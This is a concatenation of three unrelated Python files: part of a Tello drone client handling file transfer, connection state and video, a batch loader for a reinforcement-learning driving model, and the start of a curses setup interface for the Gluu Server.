self.file_recv[filenum] = DownloadedFile(filenum, size)
else:
# We always seem to get two files, one with most of the payload missing.
# Not sure what the second one is for.
log.warn(' file size: payload too small: %s' % byte_to_hexstring(pkt.get_data()))
# Ack the packet.
self.send_packet(pkt)
elif cmd == TELLO_CMD_FILE_DATA:
# log.info("recv: file data: %s" % byte_to_hexstring(data[9:21]))
# Drone is sending us a fragment of a file it told us to prepare
# for earlier.
self.recv_file_data(pkt.get_data())
else:
log.info('unknown packet: %04x %s' % (cmd, byte_to_hexstring(data)))
return False
return True
def recv_file_data(self, data):
(filenum,chunk,fragment,size) = struct.unpack('<HLLH', data[0:12])
file = self.file_recv.get(filenum, None)
# Preconditions.
if file is None:
return
if file.recvFragment(chunk, fragment, size, data[12:12+size]):
# Did this complete a chunk? Ack the chunk so the drone won't
# re-send it.
self.send_packet_data(TELLO_CMD_FILE_DATA, type=0x50,
payload=struct.pack('<BHL', 0, filenum, chunk))
if file.done():
# We have the whole file! First, send a normal ack with the first
# byte set to 1 to indicate file completion.
self.send_packet_data(TELLO_CMD_FILE_DATA, type=0x50,
payload=struct.pack('<BHL', 1, filenum, chunk))
# Then send the FILE_COMPLETE packed separately telling it how
# large we thought the file was.
self.send_packet_data(TELLO_CMD_FILE_COMPLETE, type=0x48,
payload=struct.pack('<HL', filenum, file.size))
# Inform subscribers that we have a file and clean up.
self.__publish(event=self.EVENT_FILE_RECEIVED, data=file.data())
del self.file_recv[filenum]
def record_log_data(self, path = None):
if path == None:
path = '%s/Documents/tello-%s.dat' % (
os.getenv('HOME'),
datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S'))
log.info('record log data in %s' % path)
self.log_data_file = open(path, 'wb')
def __state_machine(self, event, sender, data, **args):
self.lock.acquire()
cur_state = self.state
event_connected = False
event_disconnected = False
log.debug('event %s in state %s' % (str(event), str(self.state)))
if self.state == self.STATE_DISCONNECTED:
if event == self.__EVENT_CONN_REQ:
self.__send_conn_req()
self.state = self.STATE_CONNECTING
elif event == self.__EVENT_QUIT_REQ:
self.state = self.STATE_QUIT
event_disconnected = True
self.video_enabled = False
elif self.state == self.STATE_CONNECTING:
if event == self.__EVENT_CONN_ACK:
self.state = self.STATE_CONNECTED
event_connected = True
# send time
self.__send_time_command()
elif event == self.__EVENT_TIMEOUT:
self.__send_conn_req()
elif event == self.__EVENT_QUIT_REQ:
self.state = self.STATE_QUIT
elif self.state == self.STATE_CONNECTED:
if event == self.__EVENT_TIMEOUT:
self.__send_conn_req()
self.state = self.STATE_CONNECTING
event_disconnected = True
self.video_enabled = False
elif event == self.__EVENT_QUIT_REQ:
self.state = self.STATE_QUIT
event_disconnected = True
self.video_enabled = False
elif self.state == self.STATE_QUIT:
pass
if cur_state != self.state:
log.info('state transit %s -> %s' % (cur_state, self.state))
self.lock.release()
if event_connected:
self.__publish(event=self.EVENT_CONNECTED, **args)
self.connected.set()
if event_disconnected:
self.__publish(event=self.EVENT_DISCONNECTED, **args)
self.connected.clear()
def __recv_thread(self):
sock = self.sock
while self.state != self.STATE_QUIT:
if self.state == self.STATE_CONNECTED:
self.__send_stick_command() # ignore errors
try:
data, server = sock.recvfrom(self.udpsize)
log.debug("recv: %s" % byte_to_hexstring(data))
self.__process_packet(data)
except socket.timeout as ex:
if self.state == self.STATE_CONNECTED:
log.error('recv: timeout')
self.__publish(event=self.__EVENT_TIMEOUT)
except Exception as ex:
log.error('recv: %s' % str(ex))
show_exception(ex)
log.info('exit from the recv thread.')
def __video_thread(self):
log.info('start video thread')
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 512 * 1024) # original line
sock.setsockopt(socket.SOL_SOCKET, 25, self.net_int.encode()); # net interface bind
port = self.tello_vid_port
sock.bind(('', port))
sock.settimeout(1.0)
log.info('video receive buffer size = %d' %
sock.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))
prev_video_data = None
prev_ts = None
history = []
while self.state != self.STATE_QUIT:
if not self.video_enabled:
time.sleep(1.0)
continue
try:
data, server = sock.recvfrom(self.udpsize)
now = datetime.datetime.now()
log.debug("video recv: %s %d bytes" % (byte_to_hexstring(data[0:2]), len(data)))
show_history = False
# check video data loss
video_data = VideoData(data)
loss = video_data.gap(prev_video_data)
if loss != 0:
self.video_data_loss += loss
# enable this line to see packet history
# show_history = True
prev_video_data = video_data
# check video data interval
if prev_ts is not None and 0.1 < (now - prev_ts).total_seconds():
log.info('video recv: %d bytes %02x%02x +%03d' %
(len(data), byte(data[0]), byte(data[1]),
(now - prev_ts).total_seconds() * 1000))
prev_ts = now
# save video data history
history.append([now, len(data), byte(data[0])*256 + byte(data[1])])
if 100 < len(history):
history = history[1:]
# show video data history
if show_history:
prev_ts = history[0][0]
for i in range(1, len(history)):
[ ts, sz, sn ] = history[i]
print(' %02d:%02d:%02d.%03d %4d bytes %04x +%03d%s' %
(ts.hour, ts.minute, ts.second, ts.microsecond/1000,
sz, sn, (ts - prev_ts).total_seconds()*1000,
(' *' if i == len(history) - 1 else '')))
prev_ts = ts
history = history[-1:]
# deliver video frame to subscribers
self.__publish(event=self.EVENT_VIDEO_FRAME, data=data[2:])
self.__publish(event=self.EVENT_VIDEO_DATA, data=data)
# show video frame statistics
if self.prev_video_data_time is None:
self.prev_video_data_time = now
self.video_data_size += len(data)
dur = (now - self.prev_video_data_time).total_seconds()
if 2.0 < dur:
log.info(('video data %d bytes %5.1fKB/sec' %
(self.video_data_size, self.video_data_size / dur / 1024)) +
((' loss=%d' % self.video_data_loss) if self.video_data_loss != 0 else ''))
self.video_data_size = 0
self.prev_video_data_time = now
self.video_data_loss = 0
# keep sending start video command
self.__send_start_video()
except socket.timeout as ex:
log.error('video recv: timeout')
self.start_video()
data = None
except Exception as ex:
log.error('video recv: %s' % str(ex))
show_exception(ex)
log.info('exit from the video thread.')
if __name__ == '__main__':
print('You can use test.py for testing.')
|
batching.py
|
"""Functions to generate batches for the reinforcement learning part.
Mainly intended for training, though during the playing phase, the same
functions are used."""
from __future__ import print_function, division
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import models as models_reinforced
import cv2
from config import Config
import imgaug as ia
from lib.util import to_variable, to_cuda, to_numpy
from lib import util
from lib import actions as actionslib
from lib import replay_memory
import numpy as np
from scipy import misc
import multiprocessing
import threading
import random
import time
if sys.version_info[0] == 2:
import cPickle as pickle
from Queue import Full as QueueFull
elif sys.version_info[0] == 3:
import pickle
from queue import Full as QueueFull
xrange = range
GPU = Config.GPU
NB_REWARD_BINS = 101
class BatchData(object):
"""Method encapsulating the data of a single batch.
TODO some of the functions are named like properties, rename
"""
def __init__(self, curr_idx, images_by_timestep, images_prev_by_timestep, multiactions, rewards, speeds, is_reverse, steering_wheel, steering_wheel_raw, previous_states_distances):
self.curr_idx = curr_idx
self.images_by_timestep = images_by_timestep
self.images_prev_by_timestep = images_prev_by_timestep
self.multiactions = multiactions
self.rewards = rewards
self.speeds = speeds
self.is_reverse = is_reverse
self.steering_wheel = steering_wheel
self.steering_wheel_raw = steering_wheel_raw
self.previous_states_distances = previous_states_distances
@property
def batch_size(self):
return self.images_by_timestep.shape[1]
@property
def nb_future(self):
return self.images_prev_by_timestep.shape[0] - 1
@property
def nb_prev_per_image(self):
return self.images_prev_by_timestep.shape[2]
def reward_bin_idx(self, timestep, inbatch_idx):
timestep = self.curr_idx + timestep
reward = self.rewards[timestep, inbatch_idx]
reward_norm = (reward - Config.MIN_REWARD) / (Config.MAX_REWARD - Config.MIN_REWARD)
reward_norm = 1 - reward_norm # top to bottom
rewbin = np.clip(int(reward_norm * NB_REWARD_BINS), 0, NB_REWARD_BINS-1) # clip here, because MAX_REWARD ends up giving bin NB_REWARD_BINS, which is 1 too high
return rewbin
def rewards_bins(self, timestep):
timestep = self.curr_idx + timestep
T, B = self.rewards.shape
result = np.zeros((B, NB_REWARD_BINS), dtype=np.float32)
for b in xrange(B):
rewbin = self.reward_bin_idx(timestep-self.curr_idx, b)
result[b, rewbin] = 1
return result
def rewards_bins_all(self):
T, B = self.rewards.shape
bins_over_time = [self.rewards_bins(t) for t in xrange(-self.curr_idx, T-self.curr_idx)]
return np.array(bins_over_time, dtype=np.float32)
def inputs_supervised(self, volatile=False, requires_grad=True, gpu=GPU):
images = to_cuda(to_variable(self.images_by_timestep[0], volatile=volatile, requires_grad=requires_grad), gpu)
images_prev = to_cuda(to_variable(self.images_prev_by_timestep[0], volatile=volatile, requires_grad=requires_grad), gpu)
return images, images_prev
def inputs_reinforced_add_numpy(self, timestep=0):
timestep = self.curr_idx + timestep
B = self.batch_size
prev_indices_exclusive = [timestep - d for d in self.previous_states_distances]
prev_indices_inclusive = [timestep] + prev_indices_exclusive
ma_vecs = np.zeros((self.batch_size, len(prev_indices_exclusive), 9), dtype=np.float32)
for i, idx in enumerate(prev_indices_exclusive):
mas = self.multiactions[idx]
for b, ma in enumerate(mas):
ma_vecs[b, i, :] = actionslib.ACTIONS_TO_MULTIVEC[ma]
ma_vecs = ma_vecs.reshape(self.batch_size, -1) # (B, P*9) with P=number of previous images
speeds = self.speeds[prev_indices_inclusive, :]
steering_wheel = (self.steering_wheel[prev_indices_inclusive, :] - Config.STEERING_WHEEL_CNN_MIN) / (Config.STEERING_WHEEL_CNN_MAX - Config.STEERING_WHEEL_CNN_MIN)
steering_wheel_raw = (self.steering_wheel_raw[prev_indices_inclusive, :] - Config.STEERING_WHEEL_RAW_CNN_MIN) / (Config.STEERING_WHEEL_RAW_CNN_MAX - Config.STEERING_WHEEL_RAW_CNN_MIN)
vals = {
"speeds": np.squeeze(np.clip(speeds / Config.MAX_SPEED, 0, 1)),
"is_reverse": np.squeeze(self.is_reverse[prev_indices_inclusive, :]),
"steering_wheel": np.squeeze(steering_wheel*2 - 1),
"steering_wheel_raw": np.squeeze(steering_wheel_raw*2 - 1),
"multiactions_vecs": ma_vecs
}
if B == 1:
vals["speeds"] = vals["speeds"][:, np.newaxis]
vals["is_reverse"] = vals["is_reverse"][:, np.newaxis]
vals["steering_wheel"] = vals["steering_wheel"][:, np.newaxis]
vals["steering_wheel_raw"] = vals["steering_wheel_raw"][:, np.newaxis]
vals["speeds"] = vals["speeds"].transpose((1, 0)) # (P, B) => (B, P) with P=number of previous images
vals["is_reverse"] = vals["is_reverse"].transpose((1, 0)) # (P, B) => (B, P) with P=number of previous images
vals["steering_wheel"] = vals["steering_wheel"].transpose((1, 0)) # (P, B) => (B, P) with P=number of previous images
vals["steering_wheel_raw"] = vals["steering_wheel_raw"].transpose((1, 0)) # (P, B) => (B, P) with P=number of previous images
return vals
def inputs_reinforced_add(self, volatile=False, requires_grad=True, gpu=GPU):
return to_cuda(to_variable(self.inputs_reinforced_add_numpy(), volatile=volatile, requires_grad=requires_grad), gpu)
def future_inputs_supervised(self, volatile=False, requires_grad=True, gpu=GPU):
images = to_cuda(to_variable(self.images_by_timestep[1:], volatile=volatile, requires_grad=requires_grad), gpu)
images_prev = to_cuda(to_variable(self.images_prev_by_timestep[1:], volatile=volatile, requires_grad=requires_grad), gpu)
return images, images_prev
def future_reinforced_add(self, volatile=False, requires_grad=True, gpu=GPU):
vals = {
"speeds": [],
"is_reverse": [],
"steering_wheel": [],
"steering_wheel_raw": [],
"multiactions_vecs": []
}
for timestep in xrange(1, self.nb_future+1):
inputs_ts = self.inputs_reinforced_add_numpy(timestep=timestep)
vals["speeds"].append(inputs_ts["speeds"])
vals["is_reverse"].append(inputs_ts["is_reverse"])
vals["steering_wheel"].append(inputs_ts["steering_wheel"])
vals["steering_wheel_raw"].append(inputs_ts["steering_wheel_raw"])
vals["multiactions_vecs"].append(inputs_ts["multiactions_vecs"])
vals["speeds"] = np.array(vals["speeds"], dtype=np.float32)
vals["is_reverse"] = np.array(vals["is_reverse"], dtype=np.float32)
vals["steering_wheel"] = np.array(vals["steering_wheel"], dtype=np.float32)
vals["steering_wheel_raw"] = np.array(vals["steering_wheel_raw"], dtype=np.float32)
vals["multiactions_vecs"] = np.array(vals["multiactions_vecs"], dtype=np.float32)
T, B, _ = vals["speeds"].shape
vals_flat = {
"speeds": vals["speeds"].reshape((T*B, -1)),
"is_reverse": vals["is_reverse"].reshape((T*B, -1)),
"steering_wheel": vals["steering_wheel"].reshape((T*B, -1)),
"steering_wheel_raw": vals["steering_wheel_raw"].reshape((T*B, -1)),
"multiactions_vecs": vals["multiactions_vecs"].reshape((T*B, -1))
}
return to_cuda(to_variable(vals_flat, volatile=volatile, requires_grad=requires_grad), gpu)
def inputs_successor_multiactions_vecs(self, volatile=False, requires_grad=True, gpu=GPU):
# the successor gets in actions a and has to predict the next
# state, i.e. for tuples (s, a, r, s') it gets a and predicts s',
# hence the future actions here start at curr_idx (current state index)
# and end at -1
arr = models_reinforced.SuccessorPredictor.multiactions_to_vecs(self.multiactions[self.curr_idx:-1])
assert arr.shape == (self.nb_future, self.batch_size, 9)
return to_cuda(to_variable(arr, volatile=volatile, requires_grad=requires_grad), gpu)
def direct_rewards_values(self, volatile=False, requires_grad=True, gpu=GPU):
rews = self.rewards[self.curr_idx, :][:,np.newaxis]
rews = np.tile(rews, (1, 9))
return to_cuda(to_variable(rews, volatile=volatile, requires_grad=requires_grad), gpu)
def future_direct_rewards_values(self, volatile=False, requires_grad=True, gpu=GPU):
rews = self.rewards[self.curr_idx+1:, :][:, :, np.newaxis]
rews = np.tile(rews, (1, 1, 9))
return to_cuda(to_variable(rews, volatile=volatile, requires_grad=requires_grad), gpu)
def outputs_dr_gt(self, volatile=False, requires_grad=True, gpu=GPU):
# for a tuple (s, a, r, s'), the reward r is ought to be predicted
# that is, the reward for the previous action, which is dependent
# on the new state s' that it created
# it is saved at the previous timestep, i.e. at state s, hence
# here -1
bins = self.rewards_bins(-1)
return to_cuda(to_variable(bins, volatile=volatile, requires_grad=requires_grad), gpu)
def outputs_dr_future_gt(self, volatile=False, requires_grad=True, gpu=GPU):
# starting at curr_idx and ending at -1 here for the same reason
# as above
bins = self.rewards_bins_all()
bins = bins[self.curr_idx:-1]
return to_cuda(to_variable(bins, volatile=volatile, requires_grad=requires_grad), gpu)
def outputs_ae_gt(self, volatile=False, requires_grad=True, gpu=GPU):
imgs = self.images_by_timestep[0, ...]
imgs = np.clip(imgs*255, 0, 255).astype(np.uint8).transpose((0, 2, 3, 1))
imgs_rs = ia.imresize_many_images(imgs, (45, 80))
imgs_rs = (imgs_rs / 255.0).astype(np.float32).transpose((0, 3, 1, 2))
return to_cuda(to_variable(imgs_rs, volatile=volatile, requires_grad=requires_grad), gpu)
def chosen_action_indices(self):
mas_timestep = self.multiactions[self.curr_idx]
indices = [np.argmax(actionslib.ACTIONS_TO_MULTIVEC[ma]) for ma in mas_timestep]
return indices
def chosen_action_indices_future(self):
indices_by_timestep = []
for t_idx in xrange(self.nb_future):
mas_timestep = self.multiactions[t_idx]
indices = [np.argmax(actionslib.ACTIONS_TO_MULTIVEC[ma]) for ma in mas_timestep]
indices_by_timestep.append(indices)
return indices_by_timestep
def draw(self, timestep=0, inbatch_idx=0):
timestep = self.curr_idx + timestep
img = self.images_by_timestep[timestep-self.curr_idx, inbatch_idx, :, :, :]
img = (img.transpose((1, 2, 0))*255).astype(np.uint8)
imgs_prev = self.images_prev_by_timestep[timestep-self.curr_idx, inbatch_idx, :, :, :]
imgs_prev = (imgs_prev.transpose((1, 2, 0))*255).astype(np.uint8)
h, w = img.shape[0:2]
imgs_viz = [img] + [np.tile(imgs_prev[..., i][:, :, np.newaxis], (1, 1, 3)) for i in xrange(imgs_prev.shape[2])]
imgs_viz = [ia.imresize_single_image(im, (h, w), interpolation="cubic") for im in imgs_viz]
imgs_viz = np.hstack(imgs_viz)
rewards_bins = self.rewards_bins_all()
mas = [self.multiactions[i][inbatch_idx] for i in xrange(timestep-self.nb_prev_per_image, timestep)]
pos = [timestep] + [timestep-d for d in self.previous_states_distances]
reinforced_add = self.inputs_reinforced_add_numpy(timestep=timestep-self.curr_idx)
outputs_dr_gt = self.outputs_dr_gt()[inbatch_idx]
texts = [
"pos: " + " ".join([str(i) for i in pos]),
"Rewards: " + " ".join(["%.2f" % (self.rewards[i, inbatch_idx],) for i in pos]),
"Rewards bins: " + " ".join(["%d" % (np.argmax(rewards_bins[i, inbatch_idx]),) for i in pos]),
"Speeds: " + " ".join(["%.2f" % (self.speeds[i, inbatch_idx],) for i in pos]),
"Multiactions: " + " ".join(["%s%s" % (ma[0], ma[1]) for ma in mas]),
"Speeds RA: " + " ".join(["%.3f" % (reinforced_add["speeds"][inbatch_idx, i],) for i in xrange(reinforced_add["speeds"].shape[1])]),
"outputs_dr_gt[t=-1]: " + "%d" % (np.argmax(to_numpy(outputs_dr_gt)),)
]
texts = "\n".join(texts)
result = np.zeros((imgs_viz.shape[0]*3, imgs_viz.shape[1], 3), dtype=np.uint8)
util.draw_image(result, x=0, y=0, other_img=imgs_viz, copy=False)
result = util.draw_text(result, x=0, y=imgs_viz.shape[0]+4, text=texts, size=9)
return result
def states_to_batch(previous_states_list, states_list, augseq, previous_states_distances, model_height, model_width, model_prev_height, model_prev_width):
"""Convert multiple chains of states into a batch.
Parameters
----------
previous_states_list : list of list of State
Per chain of states a list of the previous states.
First index of the list is the batch index,
second index is the timestep. The oldest states come first.
states_list : list of list of State
Per chain of states a list of states that contain the "current"
state at the start, followed by future states.
First index is batch index, second timestep.
augseq : Augmenter
Sequence of augmenters to apply to each image. Use Noop() to make
no changes.
previous_states_distances : list of int
List of distances relative to the current state. Each distance
refers to one previous state to add to the model input.
E.g. [2, 1] adds the state 200ms and 100ms before the current "state".
model_height : int
Height of the model input images (current state).
model_width : int
Width of the model input images (current state).
model_prev_height : int
Height of the model input images (previous states).
model_prev_width : int
Width of the model input images (previous states).
Returns
----------
List of BatchData
"""
assert isinstance(previous_states_list, list)
assert isinstance(states_list, list)
assert isinstance(previous_states_list[0], list)
assert isinstance(states_list[0], list)
assert len(previous_states_list) == len(states_list)
B = len(states_list)
H, W = model_height, model_width
Hp, Wp = model_prev_height, model_prev_width
nb_prev_load = max(previous_states_distances)
nb_future_states = len(states_list[0]) - 1
nb_timesteps = nb_prev_load + 1 + nb_future_states
#images = np.zeros((nb_timesteps, B, H, W, 3), dtype=np.uint8)
#images_gray = np.zeros((nb_timesteps, B, Hp, Wp), dtype=np.float32)
images_by_timestep = np.zeros((1+nb_future_states, B, H, W, 3), dtype=np.float32)
images_gray = np.zeros((nb_timesteps, B, Hp, Wp), dtype=np.float32)
multiactions = [[] for i in xrange(nb_timesteps)]
rewards = np.zeros((nb_timesteps, B), dtype=np.float32)
speeds = np.zeros((nb_timesteps, B), dtype=np.float32)
is_reverse = np.zeros((nb_timesteps, B), dtype=np.float32)
steering_wheel = np.zeros((nb_timesteps, B), dtype=np.float32)
steering_wheel_raw = np.zeros((nb_timesteps, B), dtype=np.float32)
augseqs_det = [augseq.to_deterministic() for _ in xrange(len(states_list))]
for b, (previous_states, states) in enumerate(zip(previous_states_list, states_list)):
augseq_det = augseqs_det[b]
all_states = previous_states + states
for t, state in enumerate(all_states):
imgy = cv2.cvtColor(state.screenshot_rs, cv2.COLOR_RGB2GRAY)
imgy_rs = downscale(imgy, Hp, Wp)
imgy_rs_aug = augseq_det.augment_image(imgy_rs)
images_gray[t, b, ...] = imgy_rs
multiactions[t].append(state.multiaction)
rewards[t, b] = state.reward
if state.speed is not None:
speeds[t, b] = state.speed
if state.is_reverse is not None:
is_reverse[t, b] = int(state.is_reverse)
if state.steering_wheel_cnn is not None:
steering_wheel[t, b] = state.steering_wheel_cnn
if state.steering_wheel_raw_cnn is not None:
steering_wheel_raw[t, b] = state.steering_wheel_raw_cnn
images_gray = images_gray[..., np.newaxis]
for b, states in enumerate(states_list):
augseq_det = augseqs_det[b]
for i, state in enumerate(states):
state = states[i]
images_by_timestep[i, b, ...] = augseq_det.augment_image(downscale(state.screenshot_rs, H, W))
nb_prev_per_img = len(previous_states_distances)
images_prev_by_timestep = np.zeros((1+nb_future_states, B, Hp, Wp, nb_prev_per_img), dtype=np.float32)
for t in xrange(1 + nb_future_states):
indices = [nb_prev_load+t-d for d in previous_states_distances]
prev = images_gray[indices]
prev = prev.transpose((1, 2, 3, 4, 0)).reshape((B, Hp, Wp, nb_prev_per_img))
images_prev_by_timestep[t] = prev
images_by_timestep = (images_by_timestep.astype(np.float32) / 255.0).transpose((0, 1, 4, 2, 3))
images_prev_by_timestep = (images_prev_by_timestep.astype(np.float32) / 255.0).transpose((0, 1, 4, 2, 3))
return BatchData(nb_prev_load, images_by_timestep, images_prev_by_timestep, multiactions, rewards, speeds, is_reverse, steering_wheel, steering_wheel_raw, previous_states_distances)
def downscale(im, h, w):
if im.ndim == 2:
im = im[:, :, np.newaxis]
return np.squeeze(ia.imresize_single_image(im, (h, w), interpolation="cubic"))
else:
return ia.imresize_single_image(im, (h, w), interpolation="cubic")
class BatchLoader(object):
"""Class to load batches from the replay memory."""
def __init__(self, val, batch_size, augseq, previous_states_distances, nb_future_states, model_height, model_width, model_prev_height, model_prev_width):
self.val = val
self.batch_size = batch_size
self.augseq = augseq.deepcopy()
self.augseq.reseed(random.randint(0, 10**6))
self.previous_states_distances = previous_states_distances
self.nb_future_states = nb_future_states
self.model_height = model_height
self.model_width = model_width
self.model_prev_height = model_prev_height
self.model_prev_width = model_prev_width
self._memory = None
def load_random_batch(self):
if self._memory is None:
self._memory = replay_memory.ReplayMemory.create_instance_reinforced(val=self.val)
self._memory.update_caches()
print("Connected memory to %s, idmin=%d, idmax=%d" % ("val" if self.val else "train", self._memory.id_min, self._memory.id_max))
memory = self._memory
nb_prev = max(self.previous_states_distances)
nb_timesteps = nb_prev + 1 + self.nb_future_states
previous_states_list = []
states_list = []
for b in xrange(self.batch_size):
statechain = memory.get_random_state_chain(nb_timesteps)
previous_states_list.append(statechain[:nb_prev])
states_list.append(statechain[nb_prev:])
return states_to_batch(previous_states_list, states_list, self.augseq, self.previous_states_distances, self.model_height, self.model_width, self.model_prev_height, self.model_prev_width)
class BackgroundBatchLoader(object):
"""Class that takes a BatchLoader and executes it many times in background
processes."""
def __init__(self, batch_loader, queue_size, nb_workers, threaded=False):
self.queue = multiprocessing.Queue(queue_size)
self.workers = []
self.exit_signal = multiprocessing.Event()
for i in range(nb_workers):
seed = random.randint(1, 10**6)
if threaded:
worker = threading.Thread(target=self._load_batches, args=(batch_loader, self.queue, self.exit_signal, None))
else:
worker = multiprocessing.Process(target=self._load_batches, args=(batch_loader, self.queue, self.exit_signal, seed))
worker.daemon = True
worker.start()
self.workers.append(worker)
def get_batch(self):
return pickle.loads(self.queue.get())
def _load_batches(self, batch_loader, queue, exit_signal, seed=None):
if seed is not None:
random.seed(seed)
np.random.seed(seed)
batch_loader.augseq.reseed(seed)
ia.seed(seed)
while not exit_signal.is_set():
batch = batch_loader.load_random_batch()
start_time = time.time()
batch_str = pickle.dumps(batch, protocol=-1)
added_to_queue = False # without this, it will add the batch countless times to the queue
while not added_to_queue and not exit_signal.is_set():
try:
queue.put(batch_str, timeout=1)
added_to_queue = True
except QueueFull as e:
pass
end_time = time.time()
batch_loader._memory.close()
def join(self):
self.exit_signal.set()
time.sleep(5)
while not self.queue.empty():
_ = self.queue.get()
#self.queue.join()
for worker in self.workers:
#worker.join()
worker.terminate()
if __name__ == "__main__":
from scipy import misc
from imgaug import augmenters as iaa
MODEL_HEIGHT = 90
MODEL_WIDTH = 160
MODEL_PREV_HEIGHT = 45
MODEL_PREV_WIDTH = 80
loader = BatchLoader(
val=False, batch_size=8, augseq=iaa.Noop(),
previous_states_distances=[2, 4, 6, 8, 10],
nb_future_states=10,
model_height=MODEL_HEIGHT, model_width=MODEL_WIDTH,
model_prev_height=MODEL_PREV_HEIGHT, model_prev_width=MODEL_PREV_HEIGHT
)
for _ in xrange(1000):
for t in xrange(3):
imgs = []
for b in xrange(3):
print(t, b)
batch = loader.load_random_batch()
imgs.append(batch.draw(timestep=t, inbatch_idx=b))
misc.imshow(np.vstack(imgs))
|
tui.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import time
import random
import textwrap
import re
import socket
import curses
import string
import inspect
import threading
import math
import pymysql
import json
# for putty connections we need the following env
os.environ['NCURSES_NO_UTF8_ACS'] = "1"
from setup_app.messages import msg
from setup_app.config import Config
from setup_app import static
from setup_app.utils import base
from setup_app.utils.properties_utils import propertiesUtils
from setup_app.utils.progress import gluuProgress
from setup_app.utils.spanner import Spanner
import npyscreen
random_marketing_strings = [
'Having trouble? Open a ticket: https://support.gluu.org',
'Need to cluster? Consider moving to Kubernetes with Gluu Cloud Native Edition.',
"What is oxd? It's an API that developers use to obtain OAuth tokens or to use OpenID Connect authentication.",
'Super Gluu is free mobile 2FA applications that uses push notifications and FIDO authentication https://super.gluu.org',
'Gluu Casa enables end users to manage their 2FA credentials https://casa.gluu.org',
"Interested in VIP support? Schedule a Zoom meeting https://www.gluu.org/booking",
"Gluu Cloud Native Edition (CN) uses Kubernetes, Helm and other tools to enable efficient ways to scale.",
'Interested in Open Source software business models? Listen to Open Source Underdogs: https://opensourceunderdogs.com',
'Need to learn more about OpenID and SAML? Read "Securing the Perimeter" by Gluu CEO Mike Schwartz: https://gluu.co/book',
'The Gluu Server is one of the most advanced OpenID Providers. Compare at https://openid.net/certification',
'Installing the Gluu Server is a SNAP. Search for Gluu on https://snapcraft.io',
'Gluu Solo is coming soon. This is a hosted CE offering with 99.95% availability.',
'Need FIPS 140-2? Consider the new Gluu Server RHEL 8.4 FIPS distribution that leverages central crypto policies',
'Open Banking security is available with our new Gluu Server profile. See https://gluu.org/openbanking/',
"Gluu's core software now lives at the Linux Foundation Janssen Project. See https://github.com/JanssenProject",
'FIDO 2 is now a standalone service in the Gluu Server. The latest MacBook and iPhone devices support FIDO 2',
'One Time Password (OTP) is available out-of-the-box with the Gluu Server and Casa',
"Passwordless authentication flows enable you to improve your organization's security posture",
'Gluu supports many databases: LDAP, Couchbase, RDBMS and Google Spanner',
'OpenID is more modern and more secure then SAML; deprecate older protocols like CAS or WS-Fed',
'SCIM enables you to add, edit, delete and search users via a JSON/REST API',
'Social Login is supported with passport-js. There are hundreds of strategies available',
'Inbound SAML enables you to act as an SAML SP if your partners or customers have their own SAML IDP',
]
marketing_text_period = 15
def getClassName(c):
try:
return getattr(c, '__class__').__name__
except:
return ''
class GluuSetupApp(npyscreen.StandardApp):
do_installation = None
exit_reason = str()
my_counter = 0
do_notify = True
installed_instance = None
jettyInstaller = None
setup_loaded = {}
def onStart(self):
if Config.installed_instance:
self.addForm('MAIN', ServicesForm, name=msg.MAIN_label)
elif self.setup_loaded:
self.addForm('MAIN', DisplaySummaryForm, name=msg.DisplaySummaryForm_label)
else:
self.addForm('MAIN', MAIN, name=msg.ServicesForm_label)
self.addForm('ServicesForm', ServicesForm, name=msg.ServicesForm_label)
for obj in list(globals().items()):
if not obj[0] in ('MAIN', 'GluuSetupForm', 'ServicesForm') and obj[0].endswith('Form') and inspect.isclass(obj[1]):
self.addForm(obj[0], obj[1], name=getattr(msg, obj[0]+'_label'))
def onCleanExit(self):
if self.do_notify:
npyscreen.notify_wait("setup.py will exit in a moment. " + self.exit_reason, title="Warning!")
class GluuSetupForm(npyscreen.FormBaseNew):
def beforeEditing(self):
self.parentApp.my_counter = 0
self.add_handlers({curses.KEY_F1: self.display_help})
self.marketing_label = self.add(npyscreen.MultiLineEdit, value='', max_height=1, rely=self.lines-3, editable=False)
form_name = getClassName(self)
self.add(npyscreen.TitleFixedText, name=msg.version_label + ' ' + Config.oxVersion, rely=self.lines-5, editable=False, labelColor='CONTROL')
self.add(npyscreen.MultiLineEdit, value='=' * (self.columns - 4), max_height=1, rely=self.lines-4, editable=False)
if form_name != 'InstallStepsForm':
next_x = 20 if form_name == 'MAIN' or (Config.installed_instance and form_name == 'ServicesForm') else 28
self.button_next = self.add(npyscreen.ButtonPress, name="Next", when_pressed_function=self.nextButtonPressed, rely=self.lines-5, relx=self.columns - next_x)
if next_x == 28:
self.button_back = self.add(npyscreen.ButtonPress, name="Back", when_pressed_function=self.backButtonPressed, rely=self.lines-5, relx=self.columns - 20)
self.button_quit = self.add(npyscreen.ButtonPress, name="Quit", when_pressed_function=self.quitButtonPressed, rely=self.lines-5, relx=self.columns - 12)
if hasattr(self, 'do_beforeEditing'):
self.do_beforeEditing()
def while_waiting(self):
if self.parentApp.my_counter % marketing_text_period == 0:
self.marketing_label.value = random.choice(random_marketing_strings)
self.marketing_label.update()
self.parentApp.my_counter += 1
if hasattr(self, 'do_while_waiting'):
self.do_while_waiting()
def quitButtonPressed(self):
notify_result = npyscreen.notify_ok_cancel("Are you sure want to quit?", title= 'Warning')
if notify_result:
self.parentApp.exit_reason = msg.not_to_continue
self.parentApp.switchForm(None)
def display_help(self, code_of_key_pressed):
class_name = self.__class__.__name__
if hasattr(msg, class_name+'Help'):
help_text = getattr(msg, class_name+'Help')
else:
help_text = msg.no_help
npyscreen.notify_confirm(help_text, title="Help", wide=True)
class MAIN(GluuSetupForm):
def create(self):
desc_wrap = textwrap.wrap(msg.decription, self.columns - 6)
self.description_label = self.add(npyscreen.MultiLineEdit, value='\n'.join(desc_wrap), max_height=6, rely=2, editable=False)
self.description_label.autowrap = True
os_string = "{} {} {}".format('snap' if base.snap else '', base.os_type, base.os_version).strip()
self.os_type = self.add(npyscreen.TitleFixedText, name=msg.os_type_label, begin_entry_at=18, value=os_string, editable=False)
self.init_type = self.add(npyscreen.TitleFixedText, name=msg.init_type_label, begin_entry_at=18, value=base.os_initdaemon, editable=False)
self.httpd_type = self.add(npyscreen.TitleFixedText, name=msg.httpd_type_label, begin_entry_at=18, value=base.httpd_name, field_width=40, editable=False)
